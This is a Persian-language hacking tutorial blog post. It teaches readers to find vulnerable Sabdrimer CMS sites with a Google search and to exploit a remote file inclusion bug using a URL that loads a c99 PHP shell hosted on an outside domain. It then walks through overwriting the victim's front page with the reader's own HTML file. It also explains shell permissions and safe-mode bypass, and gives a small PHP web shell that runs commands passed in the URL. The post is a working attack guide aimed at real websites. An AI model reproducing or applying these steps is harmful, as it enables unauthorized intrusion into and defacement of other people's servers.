هک توسط شل

آموزش هك توسط shell

اول این عبارت رو تو گوگل سرچ کنید و در ضمن برای راحتی کار به صفحات اخر سرچ برید چون سایتهایی که در صفحات اولیه هستند قبلا هک شدند

"Google Search : "© Sabdrimer CMS


Exploit :

http://www.website.com/skins/advanced/advanced1.php?pluginpath[0]=[evil_script]


My PHP Shell Address : http://www.godekalb.com/data/c99.txt?


که در کد بالا به جای [evil_script] باید کد پایینیشو رو قرار بدید که کد Exploit کامل میشه :

http://www.website.com/skins/advanced/advanced1.php?pluginpath[0]=http://www.godekalb.com/data/c99.txt?


حالا مثلا شما یه سایت رو پیدا کردید که اخر ادرسش به صورت http://www.website.com/Index.php است شما باید index.php رو پاک کنید و کد بالا رو به جاش کپی کنید

البته موقع کپی حواستون باشه قسمت http://www.website.com رو همراه کد کپی نکنید

و بعد از این کار حالا اینتر کنید و فایل c99.txt که قبلا یه جا آپلود کردیم (که من برای راحتی شما قبلا آپلود کردم) تو سایتمون Inclusion میکنیم

بعد از وارد شدن به قسمت مدیریت اون وارد شاخه Public html بشید مثل تصویر و بعد اون پاییش وارد این دایرکتوری بشید و بعد اون پایین اون صفحه *.html که خودتون از قبل ساختید رو از تو هارد تون انتخاب و اپلود کنید و جایگزین صفحه سایت اصلی کنید







بعد تو قسمت ادرس بار مرورگرتون این ادرس رو تایپ کنید و حال کنید



که "فایل شما" نام فایل Html است که شما آپلود کردید

تبریک میگم شما موفق شدید
PHP shell ها چی هستند؟


در این مقاله شما با PHP Shellers آشنایی کامل پیدا خواهید کرد .


PHP Shell ها با یک سری کدهای PHP نوشته شده اند و به هکر این اجازه رو میدن که در صورت آسیب پذیر بودن server به دیگر سایتها و دیگر فایلها و پوشه های server دسترسی داشته باشه و بتونه فایل آپلود کنه یا فایلی رو بخونه یا پاک کنه یا توش چیزی بنویسه و Save کنه البته این به پرمیژنی که فایل یا پوشه داراست بستگی داره که بعدا با پرمیژن آشنا میشیم .


perm :

پرمیژن میزان دسترسی فایل یا پوشه رو تعئین میکنه . که پرم 777 از همه با لاتر هستش و دسترسی


Read - Write - Execute داره یعنی اگه Folder باشه میتونیم توی اون Folder فایل کپی کنیم یا بخونیم و یاDelete کنیم .

نکته/

اگر فایلی پرمی باشه که بشه توش Write کرد به اصطلاح بهش میگن این فایل Perm هستش !

چیزها یی که درباره Perm ها باید بدانیم :


Perm هایی که با حرف d شروع میشه یعنی اینکه پوشه هستند ( Folder ) که حرف d معرف Directory هستش مانند : drwxrwxrwx که این پرم یک پرم 777 هستش . شما در این Folder ها میتوانید فایل آپلود کنید .


Perm هایی که با خط تیره ( - ) شروع میشوند نشون میدان که فایل هست نه Folder !

برای مثال : -rw-rw-rw- که شما با Edit کردن فایل میتونید توش هر کدی رو یا نوشته ای رو save کنید .

حرف r به معنی Read و حرف W به معنی Write هستش .

اگر از شل c99 استفاده میکنید . کار شما راحتر هستش چرا که فایلها و دایرکتوری هایی که پرم هستن در C99 به رنگ سبز در قسمت مربوط به پرمها مشخص هستند و آنهایی که سفید یا قزمز هستند به معنی پرم نبودن آنها هست .

پس یادتون باشه اگر دسترسی بالا ندارید ( Root ) پس فقط در دایرکتوری و فایلهایی که پرم هستند میتوانید فایل کپی کنید یا آپلود کنید . و یا در فایلها بنویسید .

نکاتی در باره C99 :

بعد اینکه C99 رو جایی آپلود کردیم باید به نکاتی توجه کنیم :


به بالای C99 دقت کنید .






1 = این قسمت برنامه هایی که WeB Server برای WeB استفاده میکنه و همچنین ورژن php رو نشون میده .

2 = Uname -a سرور که اطلاعاتی درباره server هست رو به ما میده که من اینجا رو سیستم خودم


php shell رو بالا آوردم ( لوکال ) و از ویندوز استفاده میکنم .

3 = این قسمت خیلی مهّم هستش ! اگه Safe-Mode = On باشه server میشه گفت Secure هستش ولی باز میشه کاری کرد . در این حالت هیچ کمندی قابل اجرا نیست و رفتن به دایرکتوری دیگه ممکن نیست .در چنین مواقع میتوانید از باگ های PHP Safe Mode Bypass که سیف مد رو دور میزنه استفاده کنید . ( در صورتی که پچ نشده باشه )

4 = این قسمت دایرکتوری که در آن هستیم رو نشون مید که من اینجا در درایو C خودم هستم و با پرم 777

5 = این قسمت میزان فضای خالی هارد رو مشخص میکنه و ...

6 = این قسمت درایو های هارد منو نشون میده

به عکس زیر دقت کنید . قسمتی که با عدد 1 معرفی شده دارای 3 عمل به شرح زیر میباشد که روی یک فایل میتواند اجرا بشود . ولی روی Folder ها وقت یک عمل Info قابل اجرست که اطلاعاتی راجع به Folder به ما میدهد

به ترتیب از سمت چاپ به راست اینگونه است :


Info - Edit - Download




بسیار خوب فکر میکنم اطلاعات کافی درمورد PHP shell ها دادم .

بیایید خودمون یک نمونه php shell بنویسیم که روی یک server که php ساپورت میکنه Command اجرا کنه :

یک فایل php shell میتواند Command را به صورتهای گوناگونی که موجود است Execute کنه روی یک server که به شرح زیر هستند :




اینجا من از Shell_exec برای اجرا کردن Command خودم روی یک server استفاده میکنم . یک Notepad باز کنید و کدهای php زیر را توش بنویسین .


$cmd=$_Get['cmd'];

$exec=shell_exec("$cmd");

//"$executing";

echo

>";


?>

بسیار خوب حالا با پسوند php سیو کنید و روی یک هاست آسیب پذیر آپلود کنید . و بعد از باز کرد صفحه شل

بعد از آدرس شل این کد رو بنویسین ?cmd= بعد از (=) Command مورد نظر خود را اجرا کنید

برای مثال : http://www.site.com/shell.php?cmd=ls => در لینوکس


http://www.site.com/shell.php?cmd=dir => در ویندوز

پیشنهاد میکنم دستورات لینکوس و ویندوز رو بلد باشید مخصوصا لینکوس که بیشتر server ها لینوکس هستند

ما shell های زیادی داریم بعضی از آنها را در زیر میبینید :

c99

nstview

webadmin

cmd.php


در ضمن برای هک کردن سایتها از باگ هایی نظیر remote File Inclusion شما میتوانید این shell ها را با پسوند .txt یا بدون پسوند روی یک فضای خالی آپلود کنید و در این گونه باگ ها ازش استفاده کنید !

یک نمونه فضای رایگان www.sharemation.com بعد از ثبت نام یادتون نره که فایل آپلود شده رو از Panel خودتون Share کنید

نوشته شده در تاریخ سه شنبه 6 اردیبهشت 1390    | توسط: بهنام مبارکی    | طبقه بندی: hack pc and site،     | نظرات()